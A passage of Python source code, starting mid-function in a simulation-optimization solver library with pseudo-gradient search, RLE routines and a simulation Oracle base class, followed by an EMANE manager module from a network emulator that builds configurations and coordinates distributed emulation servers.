if fn[nobj] < fxs[nobj]:
xs = nb
fxs = fn
vxs = sen
break
return xs, fxs, vxs, n
def pli(self, x, e, nobj, kcon):
"""
Generate a convex hull and construct a pseudo-gradient
Parameters
----------
x : tuple of int
Feasible point
e : float
Feasibility constraint on points in the convex hull
nobj : int
Index of objective on which to construct the pseudo-gradient
kcon : int
Index on objective to constrain
Returns
-------
gamma : tuple of float
direction of the pseudo-gradient
gbat : tuple of float
interpolated objective values of the perturbed 'x'
xbest : tuple of int
minimizer of 'x' and its convex hull
fxbest : tuple of float
minimum value of 'x' and its convex hull
"""
q = self.dim
x0 = tuple(floor(x[i]) for i in range(q))
simp = [x0]
zi = [x[i] - x0[i] for i in range(q)]
zi.extend((0, 1))
p = argsort(zi)
p.reverse()
z = sorted(zi, reverse=True)
w = tuple(z[i] - z[i + 1] for i in range(q + 1))
prevx = x0
for i in range(1,q + 1):
x1 = tuple(prevx[j] + 1 if j == p[i] else prevx[j] for j in range(q))
simp.append(x1)
prevx = x1
n = 0
t = 0
gbat = 0
ghat = {}
xbest = None
fxbest = None
for i in range(q + 1):
isfeas, fx, vx = self.estimate(simp[i])
if isfeas:
isfeas2, fx, vx = self.estimate(simp[i], e, kcon)
if isfeas2:
if not xbest:
xbest = simp[i]
fxbest = fx
else:
if fx[nobj] < fxbest[nobj]:
xbest = simp[i]
fxbest = fx
n += 1
t += w[i]
gbat += w[i]*fx[nobj]
ghat[simp[i]] = fx
if t > 0:
gbat /= t
else:
gbat = float('inf')
if n < q + 1:
gamma = None
else:
gamma = [0]*q
for i in range(1, q + 1):
gamma[p[i]] = ghat[simp[i]][nobj] - ghat[simp[i - 1]][nobj]
return gamma, gbat, xbest, fxbest
def spli(self, x0, fx0, sex0, e, nobj, kcon, b):
"""
Repeatedly construct pseudo-gradients and search the direction
for optimal feasible points.
Parameters
----------
x0 : tuple of int
Feasible point from which to search
fx0 : tuple of float
Objective values of 'x0'
sex0 : tuple of float
Standard errors of 'fx0'
e : float
Constraint on the values of the minimizer
nobj : int
Index of objective to minimize, takes values in
{0, 1, ..., dim-1}
kcon : int
Index of objective to constrain less than 'e', takes values
in {0, 1, ..., dim-1}
b : int
Limit on calls to orc.g when searching
Returns
-------
xs: tuple of int
The point with the smallest value found by searching the
psuedo-gradients
fxs : tuple of float
The objective values of 'xs'
sexs : tuple of float
The standard errors of 'fxs'
n : int
The number of new calls to orc.g
"""
sprn = self.sprn
m = self.m
q = len(x0)
ss = 2.0
c = 2.0
xs = x0
fxs = fx0
sexs = sex0
n = 0
stop_loop = False
while not stop_loop:
x1 = perturb(x0, sprn)
gamma, gbat, xbest, fxbest = self.pli(x1, e, nobj, kcon)
if xbest:
if fxbest[nobj] < fxs[nobj]:
xs = xbest
fxs = fxbest
n += m*(q + 1)
if not gamma or gamma == [0.0]*q:
stop_loop = True
break
if n > b:
stop_loop = True
break
i = 0
x0 = xs
should_stop = False
while not should_stop:
i += 1
s = ss*pow(c, i - 1)
x1 = tuple(int(floor(x0[j] - s*gamma[j]/enorm(gamma))) for j in range(q))
isfeas, fx1, sex1 = self.estimate(x1, e, kcon)
if isfeas:
n += m
if fx1[nobj] < fxs[nobj]:
xs = x1
fxs = fx1
sexs = sex1
if not x1 == xs or n > b:
should_stop = True
x0 = xs
if i <= 2:
stop_loop = True
return xs, fxs, sexs, n
def estimate(self, x, con=float('inf'), nobj=0):
"""
Wraps simulation calls, updates the number of simulation calls,
performs feasibility checks, and stores the resulting objective
values.
Parameters
----------
x : tuple of int
Point to simulate
con : float
Constraint value to check feasibility, default is
float('inf') i.e. unconstrained
nobj : int
Index of objective to minimize, default is 0, takes values
in {0, 1, ..., len('x') -1}
Returns
-------
isfeas : bool
True if 'fx' < 'e' and 'x' is feasible to the simulation
fx : tuple of float
Objective values of 'x'
vx : tuple of float
Standard errors of 'fx'
"""
m = self.m
#first, check if x has already been sampled in this iteration
if x in self.gbar:
isfeas = True
fx = self.gbar[x]
vx = self.sehat[x]
#if not, perform sampling
else:
#print('in: ', self.orc.rng.get_seed())
try:
isfeas, fx, vx = self.orc.hit(x, m)
except TypeError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure the g signature is g(self, x, rng). ')
print('--* Ensure isfeas, (obj1, obj2, ...) is returned. ')
print('--* Aborting. ')
sys.exit()
except ZeroDivisionError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
except ValueError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure the g signature is g(self, x, rng). ')
print('--* Ensure isfeas, (obj1, obj2, ...) is returned. ')
print('--* Aborting. ')
sys.exit()
except AttributeError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Are you missing an import?')
print('--* Aborting. ')
sys.exit()
except IndexError:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Ensure len(obj1, obj2, ..) == num_obj')
print('--* Aborting. ')
sys.exit()
except:
print('--* Error: Unable to simulate ', type(self.orc).__name__, '. ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
if isfeas:
#print('out: ', self.orc.rng.get_seed())
self.num_calls += m
self.gbar[x] = fx
self.sehat[x] = vx
#next, check feasibility against the constraint which may be different
# than oracle feasibility
if isfeas:
if fx[nobj] > con:
isfeas = False
return isfeas, fx, vx
# def spsolve(self, warm_start):
# """Solve a sample path problem. Implement this in the child class."""
# pass
def upsample(self, mcS):
"""
Estimate points at the sample size of the current iteration and
store the results.
Parameters
----------
mcS : set of tuple of int
Set of feasible points of which to estimate
Returns
-------
outset : set of tuple of int
Subset of 'mcS' which are feasible
"""
outset = set()
for s in mcS:
isfeas, fs, ses = self.estimate(s)
if isfeas:
outset |= {s}
return outset
def calc_m(self, nu):
"""
Compute the iteration sample size
Parameters
----------
nu : int
the iteration number
Returns
-------
int
The sample size
"""
mmul = 1.1
m_init = self.mconst
return ceil(m_init*pow(mmul, nu))
def calc_b(self, nu):
"""
Compute the iteration search sample limit
Parameters
----------
nu : int
the iteration number
Returns
-------
int
The sample limit
"""
mmul = 1.2
m_init = self.bconst*(self.dim - 1)
return ceil(m_init*pow(mmul, nu))
def remove_nlwep(self, mcS):
"""
Remove non-LWEP's a set and return the points that cause the
removals.
Parameters
----------
mcS : set of tuple of int
Set of feasible points
Returns
-------
lwepset : set of tuple of int
Subset of 'mcS' which are LWEP's
domset : set of tuple of int
Set which causes points in 'mcS' to be removed
"""
if not mcS:
print('--* Unknown Error: Function remove_nlwep recieved an empty set.')
print('--* Aborting. ')
sys.exit()
r = self.nbor_rad
lwepset = set()
domset = set()
delz = [0]*self.num_obj
nbors = get_setnbors(mcS, r)
nbors = self.upsample(nbors)
tmpd = {x: self.gbar[x] for x in mcS | nbors}
for s in mcS:
islwep, dompts = is_lwep(s, r, tmpd)
if islwep:
lwepset |= {s}
else:
domset |= dompts
return lwepset, domset
class RLESolver(RASolver):
"""
Base class for Retrospective Approximation algorithm
implementations which rely on the RLE routine for convergence.
Attributes
----------
orc : Oracle
The problem implementation to solve
num_calls : int
The total number of calls to orc.g
num_obj : int
The number of objectives returned by orc.g
dim : int
The cardinality of points in the domain of orc.g
nbor_rad : int
The radius used to determine point neighbors, defaults is 1
mconst : int
Affects the iteration sample sizes. Default is 2
bconst : int
Affects the iteration sampling search limits.
sprn : prng.MRG32k3a object. Default is 8.
Pseudo-random number stream available to the solver, should
generate independently of orc.rng. Required.
x0 : tuple of numbers
Vector points such that x0[0] is its first component, and
x0[orc.dim - 1] is the last. Required.
gbar : dict
Dictionary of {tuple of int: tuple of float} mapping feasible
points to their objective values. In RA algorithms, it is
cleared every iteration.
sehat : dict
Like gbar, but maps feasible points to standard errors of
the objective values.
m : int
Iteration sample size which is automatically updated
b : int
Iteration search sampling limit which is automatically updated
nu : int
The iteration number
endseed : tuple of int
The next seed to be used by 'orc.rng'
betadel : float
Affects the search relaxation in RLE. Defaults to 0.5.
Parameters
----------
orc : Oracle object
kwargs : dict
Notes
-----
The method accel must be implemented to use a RLESolver in
PyMOSO.
"""
def __init__(self, orc, **kwargs):
self.betadel = kwargs.pop('betadel', 0.5)
super().__init__(orc, **kwargs)
def spsolve(self, warm_start):
"""
Skeleton function which solve sthe sample path probem implicit
in 'orc.g' by calling 'accel' then 'rle'.
Parameters
----------
warm_start : set of tuple of int
Set of feasible points which solve the sample path problem
of the previous iteration
Returns
-------
ales : set of tuple of int
Set of feasible points which solve the sample path problem
of the current iteration
"""
try:
anew = self.accel(warm_start)
except AttributeError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Missing an import?')
print('--* Aborting. ')
sys.exit()
except ZeroDivisionError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
except TypeError:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Points must be tuples.')
print('--* Aborting. ')
sys.exit()
except:
print('--* ', type(self).__name__, 'Error: Unable to run accel(). ')
print('--* Message: ', sys.exc_info()[1])
print('--* Aborting. ')
sys.exit()
ales = self.rle(anew)
return ales
# def accel(self, warm_start):
# """Accelerate RLE - Implement this function in a child class."""
# return warm_start
def rle(self, mcS):
"""
Generate an ALES from a set of feasible points
Parameters
----------
mcS : set of tuple of int
Set of feasible points
Returns
-------
mcS : set of tuple of int
Set of feasible points which are an ALES
"""
mcXw = {self.x0}
# try:
mcS = self.upsample(mcS | mcXw)
# except TypeError:
# print('--* RLE Error: Failed to upsample.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Ensure accel function returns a set.')
# print('--* Aborting. ')
# sys.exit()
# except:
# print('--* RLE Error: Failed to upsample.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Aborting. ')
# sys.exit()
b = self.b
n = 0
# try:
tmp = {s: self.gbar[s] for s in mcS | mcXw}
# except KeyError:
# print('--* RLE Error: No simulated points.')
# print('--* Message: ', sys.exc_info()[1])
# print('--* Is x0 feasible?')
# print('--* Aborting. ')
# sys.exit()
mcS = get_nondom(tmp)
mcNnc = self.get_ncn(mcS)
while n <= b and mcNnc:
old_calls = self.num_calls
mcNw, mcNd = self.remove_nlwep(mcNnc)
mcNd -= mcS
rlwepcalls = self.num_calls - old_calls
mcS |= mcNw
if not mcNw:
mcXw = self.seek_lwep(mcNd, mcS)
mcS |= mcXw
tmp = {s: self.gbar[s] for s in mcS | {self.x0}}
mcS = get_nondom(tmp)
old_calls = self.num_calls
mcNnc = self.get_ncn(mcS)
ncncalls = self.num_calls - old_calls
n += rlwepcalls + ncncalls
return mcS
def get_ncn(self, mcS):
"""
Generate the Non-Conforming neighborhood of a candidate ALES.
Parameters
----------
mcS : set of tuple of int
Set of feasible points which do not dominate each other
Returns
-------
ncn : set of tuple of int
Set of feasible points which cause mcS to not be an ALES
"""
# initialize the non-conforming neighborhood
ncn = set()
#nisdom = set()
d = self.num_obj
r = self.nbor_rad
dr = range(d)
delN = get_setnbors(mcS, r)
delzero = tuple(0 for i in dr)
# defintion 9 (a) -- check for strict domination in the deleted nbors
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
#dels = tuple(self.calc_delta(ses[i]) for i in dr)
snb = get_nbors(s, r) - mcS
for x in snb:
isfeas, fx, sex = self.estimate(x)
if isfeas:
#delx = tuple(self.calc_delta(sex[i]) for i in dr)
if does_strict_dominate(fx, fs, delzero, delzero):
ncn |= {x}
# if does_strict_dominate(fs, fx, delzero, delzero):
# nisdom |= {x}
# definition 9 (b) initialization
for x in delN - ncn:
isfeas, fx, sex = self.estimate(x)
if isfeas:
# definition 9 (b) (i) initialization
notweakdom = True
# definition 9 (b) (ii) initialization
notrelaxdom = True
# definition 9 (b) (iii) initialization
wouldnotchange = True
doesweakdom = False
# set the relaxation of the neighbor
delx = tuple(self.calc_delta(sex[i]) for i in dr)
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
if does_weak_dominate(fx, fs, delzero, delzero):
doesweakdom = True
for s in mcS:
fs = self.gbar[s]
ses = self.sehat[s]
# set the relaxation of the LES candidate member
dels = tuple(self.calc_delta(ses[i]) for i in dr)
# definition 9 (b) (i)
if does_weak_dominate(fs, fx, delzero, delzero):
notweakdom = False
# definition 9 (b) (ii)
if does_dominate(fx, fs, delzero, delzero) and does_weak_dominate(fs, fx, dels, delx):
notrelaxdom = False
# definition 9 (b) (iii)
if does_weak_dominate(fs, fx, dels, delx) or does_weak_dominate(fx, fs, delx, dels):
wouldnotchange = False
# definition 9 (b)
if notweakdom and notrelaxdom and (doesweakdom or wouldnotchange):
ncn |= {x}
return ncn
def seek_lwep(self, mcNd, mcS):
"""
Find a sample path LWEP
Parameters
----------
mcNd : set of tuple of int
Set of points which dominate non-conforming points
mcS : set of tuple of int
Set of candidate ALES points
Returns
-------
mcXw : set of tuple of int
Set of new LWEP's neither in nor dominated by members of
mcS or mcNd.
"""
b = self.b
n = 0
mcXw = set()
xnew = set() | mcNd
while not mcXw and n <= b:
old_calls = self.num_calls
mcXw, mcXd = self.remove_nlwep(xnew)
xnew = set([x for x in mcXd])
n += self.num_calls - old_calls
if not mcXw:
mcXw |= xnew
return mcXw
def calc_delta(self, se):
"""
Compute the RLE parameter for the current iteration.
Parameters
----------
se : float
Standard error of the objective value to be relaxed
Returns
-------
relax : float
"""
m = self.m
relax = se/pow(m, self.betadel)
return relax
class Oracle(object):
"""
Base class to implement black-box simulations that implicitly
define a MOSO problem.
Attributes
----------
rng : prng.MRG32k3a object
pseudo-random number generator used by the Oracle to simulate
objective values at feasible points
crnold_state : tuple
Tuple of length 2. The first item is a tuple of int, which is
an mrg32k3a seed. The second is random.Random state.
crn_obsold : tuple
Like crnold_state
crnflag : bool
Indicates whether common random numbers is turned on or off.
Defaults to off.
simpar : int
Number of processes to use when doing simulations. Defaults to 1
dim : int
Number of dimensions of feasible points
num_obj : int
Number of objectives returned by g
Parameters
----------
rng : prng.MRG32k3a object
"""
def __init__(self, rng):
self.rng = rng
self.crnold_state = rng.getstate()
self.crnflag = False
self.crn_obsold = rng.getstate()
super().__init__()
def set_simpar(self, simpar):
"""
Intialize processes when parallel replications is enabled.
Parameters
----------
simpar : int
Number of processes to use when performing simulation replications.
"""
self.simpar = simpar
if self.simpar > 1:
self.req_q = Queue()
self.res_q = Queue()
self.proc = []
for i in range(self.simpar):
p = Process(target=mp_worker, args=(self.req_q, self.res_q))
p.start()
self.proc.append(p)
def mp_cleanup(self):
"""
Terminate all multiprocessing processes created in `__init__`. Call
this after simulation is complete.
"""
if self.simpar > 1:
for p in self.proc:
p.terminate()
p.join()
def set_crnflag(self, crnflag):
"""
Set the common random number (crn) flag and intialize the
crn states.
Parameters
----------
crnflag: bool
"""
self.crnflag = crnflag
self.crnold_state = self.rng.getstate()
def set_crnold(self, old_state):
"""
Set the crn rewind state.
Parameters
----------
old_state : tuple
"""
self.crnold_state = old_state
def crn_reset(self):
"""
Rewind to the 'crnold_state'.
"""
crn_state = self.crnold_state
self.rng.setstate(crn_state)
self.crn_setobs()
def crn_advance(self):
"""
Jump ahead to the new crn baseline, and set the new rewind point
"""
self.crn_check()
self.rng = get_next_prnstream(self.rng.get_seed(), self.crnflag)
new_oldstate = self.rng.getstate()
self.set_crnold(new_oldstate)
self.crn_obsold = new_oldstate
if self.crnflag:
self.rng.generate.cache_clear()
self.rng.bsm.cache_clear()
def crn_check(self):
'''
Reset to crn_oldstate if crnflag
'''
if self.crnflag:
self.crn_reset()
def crn_setobs(self):
'''
Set an intermediate rewind point for jumping correctly.
'''
state = self.rng.getstate()
self.crn_obsold = state
def crn_nextobs(self):
'''
Jump to the next substream from the start of the previous.
'''
state = self.crn_obsold
self.rng.setstate(state)
jump_substream(self.rng)
self.crn_setobs()
def bump(self, x, m):
"""
Simulate 'm' replications at 'x' and return the replication
values as a list
Parameters
----------
x : tuple of int
point at which to simulate
m : int
number of replications to simulate 'x'
Returns
-------
isfeas : bool
Indicates if 'x' is feasible
obs : list of tuple of float
list of length 'm' of simulated objective values
"""
d = self.num_obj
dr = range(d)
isfeas = False
obs = []
mr = range(m)
if m < 1:
print('--* Error: Number of replications must be at least 1. ')
print('--* Aborting. ')
sys.exit()
else:
mr = range(m)
feas = []
for i in mr:
oisfeas, objd = self.g(x, self.rng)
feas.append(oisfeas)
obs.append(objd)
self.crn_nextobs()
if all(feas):
isfeas = True
self.crn_check()
return isfeas, obs
def hit(self, x, m):
"""
Generate the means and standard errors of 'm' simulation
replications at point 'x'.
Parameters
----------
x : tuple of int
point at which to simulate
m : int
number of replications to simulate 'x'
Returns
-------
isfeas : bool
indicates the feasibility of 'x'
obmean : tuple of float
mean of each objective of 'm' simulations
obse : tuple of float
mean of standard errors of each objective of 'm' simulations
"""
d = self.num_obj
dr = range(d)
isfeas = False
obmean = []
obse = []
mr = range(m)
assert(m >= 1)
if m == 1:
isfeas, objd = self.g(x, self.rng)
obmean = objd
obse = [0 for o in objd]
self.crn_nextobs()
else:
feas = []
objm = []
# take replications in parallel
if self.simpar > 1:
for i in mr:
# we will reconstruct objects within `mp_replicate` and then
# compute the replications in parallel
orccls = type(self)
rngcls = type(self.rng)
cseed = self.rng.get_seed()
proc_job = (mp_replicate, (orccls, x, rngcls, cseed))
self.req_q.put(proc_job)
self.crn_nextobs()
for i in mr:
# block until parallel results are ready
isfeasi, oval = self.res_q.get()
feas.append(isfeasi)
objm.append(oval)
# do not take replications in parallel
else:
for i in mr:
isfeasi, oval = self.g(x, self.rng)
feas.append(isfeasi)
objm.append(oval)
self.crn_nextobs()
if all(feas):
isfeas = True
obmean = tuple([mean([objm[i][k] for i in mr]) for k in dr])
obvar = [variance([objm[i][k] for i in mr], obmean[k]) for k in dr]
obse = tuple([sqrt(obvar[i]/m) for i in dr])
self.crn_check()
return isfeas, obmean, obse
def g(self, x, rng):
"""
Generate a single replication at point `x`.
Parameters
----------
x : tuple
rng : random.Random object
Returns
-------
bool
Indicates feasibility of `x`
tuple of float
The simulated values for each objective
"""
raise NotImplementedError
|
emanemanager.py | """
emane.py: definition of an Emane class for implementing configuration control of an EMANE emulation.
"""
import copy
import logging
import os
import threading
from core import CoreCommandError, CoreError, constants, utils
from core.api.tlv import coreapi, dataconversion
from core.config import ConfigGroup, ConfigShim, Configuration, ModelManager
from core.emane import emanemanifest
from core.emane.bypass import EmaneBypassModel
from core.emane.commeffect import EmaneCommEffectModel
from core.emane.emanemodel import EmaneModel
from core.emane.ieee80211abg import EmaneIeee80211abgModel
from core.emane.rfpipe import EmaneRfPipeModel
from core.emane.tdma import EmaneTdmaModel
from core.emulator.enumerations import (
ConfigDataTypes,
ConfigFlags,
ConfigTlvs,
MessageFlags,
MessageTypes,
NodeTypes,
RegisterTlvs,
)
from core.nodes import nodeutils
from core.xml import emanexml
try:
from emane.events import EventService
from emane.events import LocationEvent
from emane.events.eventserviceexception import EventServiceException
except ImportError:
try:
from emanesh.events import EventService
from emanesh.events import LocationEvent
from emanesh.events.eventserviceexception import EventServiceException
except ImportError:
logging.debug("compatible emane python bindings not installed")
EMANE_MODELS = [
EmaneRfPipeModel,
EmaneIeee80211abgModel,
EmaneCommEffectModel,
EmaneBypassModel,
EmaneTdmaModel,
]
DEFAULT_EMANE_PREFIX = "/usr"
class EmaneManager(ModelManager):
"""
EMANE controller object. Lives in a Session instance and is used for
building EMANE config files from all of the EmaneNode objects in this
emulation, and for controlling the EMANE daemons.
"""
name = "emane"
config_type = RegisterTlvs.EMULATION_SERVER.value
SUCCESS, NOT_NEEDED, NOT_READY = (0, 1, 2)
EVENTCFGVAR = "LIBEMANEEVENTSERVICECONFIG"
DEFAULT_LOG_LEVEL = 3
def __init__(self, session):
"""
Creates a Emane instance.
:param core.session.Session session: session this manager is tied to
:return: nothing
"""
super(EmaneManager, self).__init__()
self.session = session
self._emane_nodes = {}
self._emane_node_lock = threading.Lock()
self._ifccounts = {}
self._ifccountslock = threading.Lock()
# port numbers are allocated from these counters
self.platformport = self.session.options.get_config_int(
"emane_platform_port", 8100
)
self.transformport = self.session.options.get_config_int(
"emane_transform_port", 8200
)
self.doeventloop = False
self.eventmonthread = None
# model for global EMANE configuration options
self.emane_config = EmaneGlobalModel(session)
self.set_configs(self.emane_config.default_values())
session.broker.handlers.add(self.handledistributed)
self.service = None
self.event_device = None
self.emane_check()
def getifcconfig(self, node_id, interface, model_name):
"""
Retrieve interface configuration or node configuration if not provided.
:param int node_id: node id
:param interface: node interface
:param str model_name: model to get configuration for
:return: node/interface model configuration
:rtype: dict
"""
# use the network-wide config values or interface(NEM)-specific values?
if interface is None:
return self.get_configs(node_id=node_id, config_type=model_name)
else:
# don"t use default values when interface config is the same as net
# note here that using ifc.node.id as key allows for only one type
# of each model per node;
# TODO: use both node and interface as key
# Adamson change: first check for iface config keyed by "node:ifc.name"
# (so that nodes w/ multiple interfaces of same conftype can have
# different configs for each separate interface)
key = 1000 * interface.node.id
if interface.netindex is not None:
key += interface.netindex
# try retrieve interface specific configuration, avoid getting defaults
config = self.get_configs(node_id=key, config_type=model_name)
# otherwise retrieve the interfaces node configuration, avoid using defaults
if not config:
config = self.get_configs(
node_id=interface.node.id, config_type=model_name
)
# get non interface config, when none found
if not config:
# with EMANE 0.9.2+, we need an extra NEM XML from
# model.buildnemxmlfiles(), so defaults are returned here
config = self.get_configs(node_id=node_id, config_type=model_name)
return config
def config_reset(self, node_id=None):
super(EmaneManager, self).config_reset(node_id)
self.set_configs(self.emane_config.default_values())
def emane_check(self):
"""
Check if emane is installed and load models.
:return: nothing
"""
try:
# check for emane
emane_version = utils.check_cmd(["emane", "--version"])
logging.info("using EMANE: %s", emane_version)
# load default emane models
self.load_models(EMANE_MODELS)
# load custom models
custom_models_path = self.session.options.get_config("emane_models_dir")
if custom_models_path:
emane_models = utils.load_classes(custom_models_path, EmaneModel)
self.load_models(emane_models)
except CoreCommandError:
logging.info("emane is not installed")
def deleteeventservice(self):
if self.service:
for fd in self.service._readFd, self.service._writeFd:
if fd >= 0:
os.close(fd)
for f in self.service._socket, self.service._socketOTA:
if f:
f.close()
self.service = None
self.event_device = None
def initeventservice(self, filename=None, shutdown=False):
"""
Re-initialize the EMANE Event service.
The multicast group and/or port may be configured.
"""
self.deleteeventservice()
if shutdown:
return
# Get the control network to be used for events
group, port = self.get_config("eventservicegroup").split(":")
self.event_device = self.get_config("eventservicedevice")
eventnetidx = self.session.get_control_net_index(self.event_device)
if eventnetidx < 0:
logging.error(
"invalid emane event service device provided: %s", self.event_device
)
return False
# make sure the event control network is in place
eventnet = self.session.add_remove_control_net(
net_index=eventnetidx, remove=False, conf_required=False
)
if eventnet is not None:
# direct EMANE events towards control net bridge
self.event_device = eventnet.brname
eventchannel = (group, int(port), self.event_device)
# disabled otachannel for event service
# only needed for e.g. antennaprofile events xmit by models
logging.info("using %s for event service traffic", self.event_device)
try:
self.service = EventService(eventchannel=eventchannel, otachannel=None)
except EventServiceException:
logging.exception("error instantiating emane EventService")
return True
def load_models(self, emane_models):
"""
Load EMANE models and make them available.
"""
for emane_model in emane_models:
logging.debug("loading emane model: %s", emane_model.__name__)
emane_prefix = self.session.options.get_config(
"emane_prefix", default=DEFAULT_EMANE_PREFIX
)
emane_model.load(emane_prefix)
self.models[emane_model.name] = emane_model
def add_node(self, emane_node):
"""
Add a new EmaneNode object to this Emane controller object
:param core.emane.nodes.EmaneNode emane_node: emane node to add
:return: nothing
"""
with self._emane_node_lock:
if emane_node.id in self._emane_nodes:
raise KeyError(
"non-unique EMANE object id %s for %s" % (emane_node.id, emane_node)
)
self._emane_nodes[emane_node.id] = emane_node
def getnodes(self):
"""
Return a set of CoreNodes that are linked to an EmaneNode,
e.g. containers having one or more radio interfaces.
"""
# assumes self._objslock already held
nodes = set()
for emane_node in self._emane_nodes.values():
for netif in emane_node.netifs():
nodes.add(netif.node)
return nodes
def setup(self):
"""
Populate self._objs with EmaneNodes; perform distributed setup;
associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._nodes_lock:
for node_id in self.session.nodes:
node = self.session.nodes[node_id]
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug(
"adding emane node: id(%s) name(%s)", node.id, node.name
)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
netidx = self.session.get_control_net_index(otadev)
logging.debug(
"emane ota manager device: index(%s) otadev(%s)", netidx, otadev
)
if netidx < 0:
logging.error(
"EMANE cannot start, check core config. invalid OTA device provided: %s",
otadev,
)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(
net_index=netidx, remove=False, conf_required=False
)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error(
"EMANE cannot start, check core config. invalid event service device: %s",
eventdev,
)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(
net_index=netidx, remove=False, conf_required=False
)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
for netif in emane_node.netifs():
nems.append(
(netif.node.name, netif.name, emane_node.getnemid(netif))
)
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug(
"post startup for emane node: %s - %s",
emane_node.id,
emane_node.name,
)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int(
"emane_platform_port", 8100
)
self.transformport = self.session.options.get_config_int(
"emane_transform_port", 8200
)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if (
message.message_type == MessageTypes.LINK.value
and message.flags & MessageFlags.ADD.value
):
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session if we are the "master" Emane object?
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
# create temporary config for updating distributed nodes
typeflags = ConfigFlags.UPDATE.value
config = copy.deepcopy(self.get_configs())
config["platform_id_start"] = str(platformid)
config["nem_id_start"] = str(nemid)
config_data = ConfigShim.config_data(
0, None, typeflags, self.emane_config, config
)
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
